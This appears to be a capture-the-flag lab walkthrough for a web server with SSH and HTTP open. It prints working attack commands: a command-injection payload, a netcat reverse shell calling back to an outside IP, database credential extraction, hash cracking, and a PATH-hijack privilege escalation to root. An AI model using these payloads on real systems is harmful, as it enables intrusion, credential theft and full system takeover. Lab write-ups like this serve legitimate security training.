ok we have 2 opened ports 22,80
let’s check port 80 first…
first thing we found was a login page so i tried defaults Cred. `admin:admin`
but didn’t work.
so i started to directory brute-forcing and found that all dirs redirect me to login.
So i opened my ` burp suite` and intercepted requests before redirecting. and found that it’s load page content then redirect me, if i changed Status code to 200 i can access pages.
I started to access all pages with this way and Enumerating the Website…
so, what i found was a `sitebackup.zip` and we all already know what that mean xD … source code for site.
I downloaded it and start check some files like `config.php`, `logs.php`
here i found that in php file it uses `exec` to run another script in system and didn’t even validate input.
** we can access this function from request to ``/file_logs.php`` and choose any delim then intercept request with Burp.
so, created my payload to check for RCE `nc -nlvp 1234` then from the burp send request a file from my system.
`delim=comma%26curl+http://10.10.16.3:1234` and good it’s accepted `200 OK`
Access [m4lwhere] user
so i make my payload to get revshell -> `comma%26rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Cbash%20-i%202>%261%7Cnc%2010.10.16.3%204444%20>/tmp/f`
OK we have a revshell as `www-data` , as we found before in `config.php` i go to run mysql to check databases.
`echo “mySQL_p@ssw0rd!:)” | mysql -u root -p ` and started to interact with database
we have `m4lwhere` password hash now. `$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.`
using hashcat or john
`hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt` ,
`john — format=md5crypt-long — wordlist=/usr/share/wordlists/rockyou.txt hash `
we got password `ilovecody112235!` we can now connect to ssh with this user Cred.
Privilege Escalation
we got this script we can run as root. but we cannot edit it
- if we read script carfully we can se that it uses `date` command so we can overrite this command with our code.
bash-4.4$ echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > date
bash-4.4$ chmod 777 date
bash-4.4$ export PATH=/tmp:$PATH
bash-4.4$ sudo /opt/scripts/access_backup.sh
1) first line we make a copy from `/bin/bash` and change it’s perm then we add it to file called `date`.
2) second line we change prem to file to make it executable by anyone.
3) third line we add the path of file at begging of `PATH`
so when we run script first `date` will run will execute our file not main command.
4) we run main privilege file as sudo and wait for it.
And ….
Last step is to check for file that we copied
Congrats!!! you are root now….